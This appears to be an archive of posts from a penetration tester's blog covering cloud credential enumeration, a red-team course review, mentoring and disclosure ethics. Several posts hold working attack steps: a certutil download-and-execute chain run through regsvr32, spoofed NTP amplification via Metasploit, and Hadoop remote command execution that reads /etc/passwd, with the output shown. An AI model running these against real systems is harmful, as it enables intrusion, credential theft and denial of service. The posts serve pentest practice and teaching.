+--------------+------------------+----------------------+---------------------+--------------------------+
| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Unauthenticated | Etcd is accessible | Etcd is accessible | {"etcdserver":"3.3.9 |
| | Access | using insecure | using HTTP (without | ","etcdcluster":"3.3 |
| | | connection (HTTP) | authorization and | ... |
| | | | authentication), it | |
| | | | would allow a | |
| | | | potential attacker | |
| | | | to | |
| | | | gain access to | |
| | | | the etcd | |
+---------------------+----------------------+----------------------+----------------------+--------------+
| 1.2.3.4:2379 | Information | Etcd Remote version | Remote version | {"etcdserver":"3.3.9 |
| | Disclosure | disclosure | disclosure might | ","etcdcluster":"3.3 |
| | | | give an attacker a | ... |
| | | | valuable data to | |
| | | | attack a cluster | |
+---------------------+----------------------+----------------------+----------------------+--------------+
| 1.2.3.4:2379 | Access Risk | Etcd Remote Read | Remote read access | {"action":"get","nod |
| | | Access Event | might expose to an | e":{"dir":true,"node |
| | | | attacker cluster's | ... |
| | | | possible exploits, | |
| | | | secrets and more. | |
+--------------+------------------+----------------------+---------------------+--------------------------+
Tags: cloud
January 02, 2019
11:05
I found a GCP service account token...now what?
» ‎ Carnal0wnage

Google Cloud Platform (GCP) is rapidly growing in popularity and i haven't seen too many posts on f**king it up so I'm going to do at least one :-)

Google has several ways to do authentication but most likely what you are going to come across shoved into code somewhere or in a dotfiles is a service account json file.

It's going to look similar to this:

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don't already have console and/or IAM access. However with a little bit of scripting we can brute force at least some of the token's functionality pretty quickly. The issue being service accounts for something like GCP compute looks the same as one you made to manage your calendar or one of the 100's of other Google services.

You'll need to install the gcloud tools for you OS. Info here: https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed you can auth with the json file with the following command:

gcloud auth activate-service-account --key-file=KEY_FILE

If they key is invalid you'll see something like the below:

gcloud auth activate-service-account --key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account --key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

you can validate it worked by issuing gcloud auth list command:

gcloud auth list
Credentialed Accounts
ACTIVE ACCOUNT

* python@removed.iam.gserviceaccount.com

I put together a shell script that runs though a bunch of command to enumerate information. They only you info need to provide is the project name. This can be found in the json file in the project_id field or by issuing the gcloud project list command. Sometimes there are multiple projects associated with an account and you'd need to run the shell script with for each project.
The first time you run these api calls you might need to pass a "Y" to the cli to enable it. you can get around this manual shenanigans by doing a:
yes | ./gcp_enum.sh
This will answer Yes for you each time :-)
The script is here: https://gist.github.com/carnal0wnage/757d19520fcd9764b24ebd1d89481541

NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite

enjoy

CG
Tags: cloud
November 29, 2018
16:51
AWS EC2 instance userData
» ‎ Carnal0wnage

In the effort to get me blogging again I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general I thought metadata was only things you can hit from WITHIN the instance via the metadata url: http://169.254.169.254/latest/meta-data/

However, if you read the link above there is an option to add metadata at boot time.

You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script.

That's interesting right?!?! so if you have some AWS creds the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
"InstanceId": "i-0XXXXXXXX",
"UserData": {
"Value": "bm90IHRvZGF5IElTSVMgOi0p"}

anyway that can get tedious especially if the org has a ton of things running. This is precisely the reason @cktricky and I built weirdAAL. Surely no one would be sticking creds into things at boot time via shell scripts :-)

The module loops trough all the regions and any instances it finds and queries for the userData attribute. Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f4f4f4; background-color: #000000} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f4f4f4; background-color: #000000; min-height: 17.0px} span.s1 {font-variant-ligatures: no-common-ligatures}
Tags: aws
February 08, 2018
14:31
Dark Side Ops I & 2 Review
» ‎ Carnal0wnage

Dark Side Ops I
https://silentbreaksecurity.com/training/dark-side-ops/
https://www.blackhat.com/us-17/training/dark-side-ops-custom-penetration-testing.html

A really good overview of the class is here https://www.ethicalhacker.net/features/root/course-review-dark-side-ops-custom-penetration-testing

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-)
I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn’t enough setup around the “how” to consistently do it either unless you have a strong windows API background. However, one of the labs consisted of adding load and run powershell functionality which allows you to make use of the plethora of powershell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The visual studio piece can get overwhelming but it definitely gives you a big taste of (Windows) implant development. The class material are getting slightly dated in some cases. A refresh might be helpful. More Throwback usage & development would be fun (even as optional labs).

DSO II
https://silentbreaksecurity.com/training/dark-side-ops-2-adversary-simulation/
https://www.blackhat.com/us-17/training/dark-side-ops-ii-adversary-simulation.html

Lab one was getting a fresh copy of slingshot back up and running and then setting up some additional code to do a powershell web cradle to get our slingshot implant up and running on a remote host. Similar to how metasploit web delivery does things.

Lab 2 was doing some devops to set up servers, OpenVPN to tunnel traffic, and adding HTTPS to our slingshot codebase.

Lab 3 was some Initial activity labs (HTA and chrome plugin exploitation)

Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasions as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or just for people doing response.

Lab 5 whitelist bypassing

Lab 6 was doing some profiling via powershell and using slingshot to be able to do checks on the host

Labs 7-9 building a kernel rootkit

Lab 10 persistence via COM Hijacking and hiding our custom DLL in the registry and Lab 11 was privilege escalation via custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

Criticisms:
I think the set of courses are having a bit of an identity crisis mostly due to the 2 day
format and would be a much better class as a 5 day. It is heavy development focused meaning you
spend a lot of time in Visual Studio tweaking C code. The “operations” piece of the course definitely
suffers a bit due to all the dev time. There was minimal talk around lateral movement and the whole
thing is entirely Windows focused so no Linux and no OSX. A suggestion to fix the “ops” piece
would be to have a Dark Side Ops - Dev and Dark Side Ops - Operator courses where the dev one
is solely deving your implant and the Operator course would be solely using the implant you dev’d
(or was provided to you). The Silent Break team definitely knows their stuff and a longer class
format or switch up would allow them to showcase that more efficiently.

Tags:
November 16, 2017
8:14
Books I'd give to my 30yr old self
» ‎ Carnal0wnage

A good friend/co-worker recently turned 30. In preparation for his birthday party I gave some thought to my 30th birthday and the things I now know or have an idea about and what I wish I had known at that point in my life.

I decided to buy him a few books that had impacted my life since my 30th birthday and that I wish I had know or read earlier in life.

I'll split the post into two parts; computer books and life/metaphysical books.

Computer books

This is by no means an exhaustive list. A more exhaustive list can be found here (recently updated).

He already had The Web Application Hacker's Handbook but had he not I would have purchased a copy for him. There are lots of Web Hacking books but WAHH is probably the best and most comprehensive one.

The other books I did purchase were The Phoenix Project and Zero to One.

The Phoenix Project is absolutely one of the best tech books I've read in the last few years. Working for Silicon Valley companies I think it can be easy to take for granted the whole idea of DevOps and the power it brings when you can do infrastructure as code, micro services, and the flexibility DevOps can bring to prototyping and developing code and projects. There is also the "security guy" in the story that serves as the guy we never want to be but sometimes end up being unbeknownst to us.

The running joke is that Zero to One is in the Hipster starter kit but I thought it was a great book. The quick summary is that Peter Thiel describes businesses that iterate on a known problem and can be successful and there are businesses that create solutions to problems we didn't know we had. Examples of the latter being companies like Google, Facebook, PayPal, Uber. It's a short book and should be required reading for anyone thinking of starting a business.

The following is life stuff, so if all you care about is tech shit, feel free to eject at this point.

still here?

Metaphysics

1st, Many Lives Many Masters by Brian Weiss A nice gentle introduction into the idea that we reincarnate and our eternal souls. Written by a psychiatrist who more or less stumbled into the fact that people have past lives while doing normal psychiatry work.

From Amazon:
"As a traditional psychotherapist, Dr. Brian Weiss was astonished and skeptical when one of his patients began recalling past-life traumas that seemed to hold the key to her recurring nightmares and anxiety attacks. His skepticism was eroded, however, when she began to channel messages from the “space between lives,” which contained remarkable revelations about Dr. Weiss’ family and his dead son. Using past-life therapy, he was able to cure the patient and embark on a new, more meaningful phase of his own career."

2nd, A New Earth by Eckert Tolle This is the best book i read in 2016 and I've been sharing it with everyone I can. Everyone in infosec should read this book to understand the way the ego works in our day to day lives.

From Amazon:
In A New Earth, Tolle expands on these powerful ideas to show how transcending our ego-based state of consciousness is not only essential to personal happiness, but also the key to ending conflict and suffering throughout the world. Tolle describes how our attachment to the ego creates the dysfunction that leads to anger, jealousy, and unhappiness, and shows readers how to awaken to a new state of consciousness and follow the path to a truly fulfilling existence.

3rd, Self Observation by Red Hawk. The practical application guide if you got something from A New Earth. An instruction manual around self-observation.

From Amazon:
"This book is an in-depth examination of the much needed process of 'self'-study known as self observation. We live in an age where the "attention function" in the brain has been badly damaged by TV and computers - up to 90 percent of the public under age 35 suffers from attention-deficit disorder! This book offers the most direct, non-pharmaceutical means of healing attention dysfunction. The methods presented here are capable of restoring attention to a fully functional and powerful tool for success in life and relationships. This is also an age when humanity has lost its connection with conscience. When humanity has poisoned the Earth's atmosphere, water, air and soil, when cancer is in epidemic proportions and is mainly an environmental illness, the author asks: What is the root cause? And he boldly answers: failure to develop conscience! Self-observation, he asserts, is the most ancient, scientific, and proven means to develop this crucial inner guide to awakening and a moral life. This book is for the lay-reader, both the beginner and the advanced student of self observation. No other book on the market examines this practice in such detail. There are hundreds of books on self-help and meditation, but almost none on self-study via self observation, and none with the depth of analysis, wealth of explication, and richness of experience which this book offers."

Finance

Rich Dad Poor Dad, I talked about this in 2013: http://carnal0wnage.attackresearch.com/2013/12/best-non-technical-book-i-read-this-year.html
Tags:
August 25, 2017
5:00
Mentoring: On Blogging
» ‎ Carnal0wnage
Received the question about blogging. More specifically:
- How and Why
- How to benefit from blogging
- How to be consistent with posting
In my mind, the key to success and blogging is to be totally selfish in its planning and execution.
Blogging is a personal activity/journey that you allow the public to be a part of. What I mean by this is that the main audience for your blog should be YOU. My blog is a place where I take notes and occasionally try to talk about a more touchy-feely topics or issues. These notes are notes that I'm ok with sharing publicly. I also keep a private blog (but really more notes/cheat-sheet think RTFM...I use MDwiki) because you don't need to give everyone all your tricks and secrets. If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers) what value are you bringing to your employer?
The benefit to blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes. When I figure out how to mess with technology X, I take notes on it. As a consultant, it may be months or years before I see it again. Having notes to go back to saves time and stress. It also allows me to help people on my team in the event they run into it while I am on a different project.
How/Platforms: I use Blogger because I don't want to secure/worry about my blogging platform. This blog was on Drupal for a bit and some jerk person decided to make an example of the blog's lack of updates publicly at BlackHat (appreciate the heads up...#totallynotbitter). With Blogger, hosted WordPress, or some other hosted platform I'm offloading the risk and I don't have to worry about keeping up with patches.
Consistently posting. No idea. It's clear I have lost the ability to consistently post. I do sometimes queue up a bunch of posts and schedule their posting. I've found it was easier to find things to blog about when I was consulting since I had a different client every week so it would be difficult to tie a vulnerability back to any particular client. Now that I work for a company, if I'm talking about some vulnerability or exploit I used there is a good chance I used it for work; potentially exposing the company to risk.

Length. No one reads long posts. Break long posts into separate logical posts even if you choose to post them at the same time.

Also see the "On Social Media" post (Todo)

Also
https://www.j4vv4d.com/a-blog-about-blogging-with-bloggers/

Also see this timely tweet by Robin Wood
https://twitter.com/digininja/status/900340713669279745

Tags: mentoring
August 21, 2017
5:00
Certutil for delivery of files
» ‎ Carnal0wnage

Quick post putting together some twitter awesomeness

references:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936

Let's do it

1. Create your DLL
2. Base64encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down

4. Base64decode the file with certutil

5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll

Tags: Pentesting
June 29, 2017
5:07
Follow up to the vuln disclosure post
» ‎ Carnal0wnage

Summary of responses from this post: http://carnal0wnage.attackresearch.com/2017/06/vulnerability-disclosure-free-bug.html

I wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.

I received a few replies (less than I hoped for though). To summarize a few:

-I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln but I should not expect them.

-Bug Bounty awards are appreciation for the work not a right.

-Someone made a nice analogy to losing AWS/Slack keys to losing a cell phone or cat. Every person might value the return of that cat or phone differently.

-I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train. **I think this is not quite the same situation but I appreciate the comment**

-The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.

-They [the vulns] have value - just not monetary. The value is to the end-user.

-Generally speaking, I [the author of the comment] think quite a lot of the BB crowd have a self-entitled, bad attitude.

-Always ask yourself if this will hurt innocent people. If so, report it, but make sure the public knows that they f*cked it up.

This blog post reply: https://blog.anantshri.info/response-vulnerability-disclosure-free-bug-reports-greedy-bastard/
---

I got a variety responses from it's the right thing to do... up to if they don't pay up, they don't get the info. Collectively, I don't think we are any closer to an answer.

To get a bit more personal on the subject. I think this piece from Ferris Bueller's Day Off sums it up to an extent:

https://www.youtube.com/watch?v=H19uKs99vIw&feature=youtu.be&t=1m15s

"The problem is with me"

I've been giving quite a bit of thought to what component of the process brings me the most excitement and enjoyment. I believe I have identified what component brings me the most enjoyment and will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

More things to think about for sure :-)

Tags:
June 26, 2017
6:04
Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard
» ‎ Carnal0wnage

Backstory:

Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day". These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work thru some of these issues and have a discussion about the topics.

Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something? If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level? mom and pop maybe not, VC funded startup? 30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough or have we evolved as a society where basically everything deserves some sort of monetary reward. After being an observer for two BB programs...."f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro" does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes]
Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomeware'd or their EC2 infra shut down/turned off/deleted codespaces style am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty signifiant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably wont get $$ make me a "bad person"? numbers 1-3 come into play here for sure

My last two jobs, I've worked for companies that had Bug Bounty programs so my opinion on the above is DEFINITELY shaped by working for companies that get it understand and care about their security posture and do feel that reporting security issues by outside researchers has monetary value. An added benefit to have a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.

Thoughts/comments VERY welcome on this one. Leaving comments seems out of style now but I do have open DM on twitter if you want to go that route. I have a few real world experiences with this where I let some companies know some pretty serious stuff (slack token with access to corp slack, S3 buckets with creds/db backups, and root aws keys checked into github for weeks) where it was fixed with no drama but no bounty paid.

-CG
Tags:
June 20, 2017
15:54
NTP/SNMP amplification attacks
» ‎ Carnal0wnage

I needed to verify a SNMP and NTP amplification vulnerability was actually working.

Metasploit has a few scanners for ntp vulns in the auxiliary/scanner/ntp/ntp_* and it will report hosts as being vulnerable to amplification attacks.

msf auxiliary(ntp_readvar) > run
[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f5f5f5; background-color: #000000} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f5f5f5; background-color: #000000; min-height: 17.0px} span.s1 {text-decoration: underline ; font-variant-ligatures: no-common-ligatures} span.s2 {font-variant-ligatures: no-common-ligatures} span.s3 {font-variant-ligatures: no-common-ligatures; color: #c33720} span.s4 {font-variant-ligatures: no-common-ligatures; color: #5330e1} span.s5 {font-variant-ligatures: no-common-ligatures; color: #34bd26}
[+] 1.1.1.1:123 - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplification

I've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up 2 boxes to run the attack; an attack box and a target box that I used as the spoofed source IP address. I ran tcpdump on the target/spoofed server (yes...listening for UDP packets) it was receiving no UDP packets when I ran the attack. If I didn't spoof the source IP, the vulnerable server would send data back to the attacker IP but not the spoofed IP.

Metasploit (running as root) can spoof the IP for you:

msf auxiliary(ntp_readvar) > set SRCIP 2.2.2.2 p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f5f5f5; background-color: #000000} span.s1 {text-decoration: underline ; font-variant-ligatures: no-common-ligatures} span.s2 {font-variant-ligatures: no-common-ligatures} span.s3 {font-variant-ligatures: no-common-ligatures; color: #c33720} SRCIP => 2.2.2.2msf auxiliary(ntp_readvar) > run
[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f5f5f5; background-color: #000000} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f5f5f5; background-color: #000000; min-height: 17.0px} span.s1 {text-decoration: underline ; font-variant-ligatures: no-common-ligatures} span.s2 {font-variant-ligatures: no-common-ligatures} span.s3 {font-variant-ligatures: no-common-ligatures; color: #c33720} span.s4 {font-variant-ligatures: no-common-ligatures; color: #5330e1}
[*] Sending 1 packet(s) to 1.1.1.1 from 2.2.2.2

To rule out it wasn't a Metasploit thing I also worked thru the attack with scapy following the examples here:
http://www.nothink.org/misc/snmp_reflected.php

So I asked on Twitter...fucking mistake...after getting past the trolls and well intentioned people that didn't think I understood basic networking/spoofing at all (heart u) link #1, link #2 as the likely reason I couldn't spoof the IP. As well as a hint that the last time someone got it to work they had to rent a physical server in a dodgy colo.

A bit of reading later I found https://spoofer.caida.org/recent_tests.php which allows you to check and see if a particular ASN supports spoofing along with the stats that only 20% of the Internet allows spoofing.

source: https://spoofer.caida.org/summary.php

Checking common ISP and cloud provider ASNs showed that most weren't vulnerable to spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.

P.S.
Someone asked if the vuln host was receiving the traffic. I couldn't answer for the initial host but to satisfy my curiosity on the issue I built a vulnerable NTP server and it did NOT receive the traffic even with hosts from the same VPS provider in the same data center (different subnets).

Tags: amplification attacks
June 07, 2017
7:01
Mentoring: On meeting your **Heroes**
» ‎ Carnal0wnage

Mentoring: On meeting your **Heroes**

I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote about even the most popular infosec person is like being a famous bowler. Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.

This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceed to be a drunk dbag to him. It ended up taking quite a bit of wind out of his sail to have someone he kinda looked up to bag on his current career state and talks he was working on.

When I first joined the army how I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do no wrong, individual. Shit, If someone has all this shit on their chest they must be badass right??!!
For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_Army

Well the Army does a great job of stacking the people you initially meet as being pretty decent individuals. I think most people think highly of their drill sergeants their entire life. So the first few people I met that had these badges reaffirmed this belief. Then I got out and met a few more and was completely let down at the quality of these people. When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military you get to wear a badge you earned at any point in your career your entire career. So maybe as some point someone was awesome enough to earn a badge. This doesn't mean they are a great leader, still good at what the badge means they are good at or even a good person. It means at one point in time they met a criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that 10 years later are still riding the vapor trails of some awesome shit they did but havent done anything else relevant since. Some people have giant egos that only care about you if you are currently in the process of kissing their ass. To be fair if people ARE kissing your ass its hard not get an ego but you have to work hard to check that shit at the door.

Remember we are famous bowlers?

What can you do?

Check your ego.

Stay Humble.

Help (mentor) others.

Always remember how you felt when that hero dissed you when you are someone else's hero.

-CG

Tags: mentoring
June 05, 2017
7:00
DevOoops: Hadoop
» ‎ Carnal0wnage
What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."
from: http://hadoop.apache.org/

If you've ever heard of MapReduce...you've heard of Hadoop.

NFI what i'm talking a bout? Here is a 3minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QY

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny zeronights talk:

Hue
Common defaults admin/admin, cloudera/cloudera

Although occasionally you'll find one that will just let you pick your own :-)
If you gain access, full HDFS access, run queries, etc

HDFS WebUIHDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).

From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.

update:The hadoop attack library is worth checking out.
https://github.com/wavestone-cdt/hadoop-attack-library

Most up-to-date presentation on hadoop attack library: https://www.slideshare.net/phdays/hadoop-76515903

There is a piece around RCE (https://github.com/CERT-W/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands)

You'll need info found in ip:50070/conf

TLDR; find the correct open Hadoop ports and run a map reduce job against the remote hadoop server.
You need to be able to access the following Hadoop services through the network:
- YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
- NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
- DataNode data transfer service in order to upload/download file: usually on port 50010
Let's see it in action:

lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE
17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicablepackageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:803217/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:803217/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 117/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:217/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_000117/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_000117/01/05 22:11:45 INFO mapreduce.Job: The url to track the job: http://nope.members.linode.com:8088/proxy/application_1483672290130_0001/17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_000117/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false17/01/05 22:12:00 INFO mapreduce.Job: map 0% reduce 0%17/01/05 22:12:10 INFO mapreduce.Job: map 100% reduce 0%17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30 File System Counters FILE: Number of bytes read=0 FILE: Number of bytes written=240754 FILE: Number of read operations=0 FILE: Number of large read operations=0 FILE: Number of write operations=0 HDFS: Number of bytes read=222 HDFS: Number of bytes written=2982 HDFS: Number of read operations=10 HDFS: Number of large read operations=0 HDFS: Number of write operations=4 Job Counters Launched map tasks=2 Data-local map tasks=2 Total time spent by all maps in occupied slots (ms)=21171 Total time spent by all reduces in occupied slots (ms)=0 Total time spent by all map tasks (ms)=21171 Total vcore-milliseconds taken by all map tasks=21171 Total megabyte-milliseconds taken by all map tasks=21679104 Map-Reduce Framework Map input records=1 Map output records=56 Input split bytes=204 Spilled Records=0 Failed Shuffles=0 Merged Map outputs=0 GC time elapsed (ms)=279 CPU time spent (ms)=1290 Physical memory (bytes) snapshot=209928192 Virtual memory (bytes) snapshot=3763986432 Total committed heap usage (bytes)=65142784 File Input Format Counters Bytes Read=18 File Output Format Counters Bytes Written=298217/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah
lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicableFound 3 items-rw-r--r-- 3 root supergroup 0 2017-01-05 22:12 blah_blah/_SUCCESS-rw-r--r-- 3 root supergroup 1491 2017-01-05 22:12 blah_blah/part-00000-rw-r--r-- 3 root supergroup 1491 2017-01-05 22:12 blah_blah/part-00001
lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-0000117/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin hduser:x:1000:1000:,,,:/home/hduser:/bin/bash

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

Walks you thru how to get reverse shells or meterpreter shells (windows) if you can run commands.

Resources:
http://2015.zeronights.org/assets/files/03-Kaluzny.pdf

video of above talk from appsecEU 2015 https://www.youtube.com/watch?v=ClXKGI8AzTk
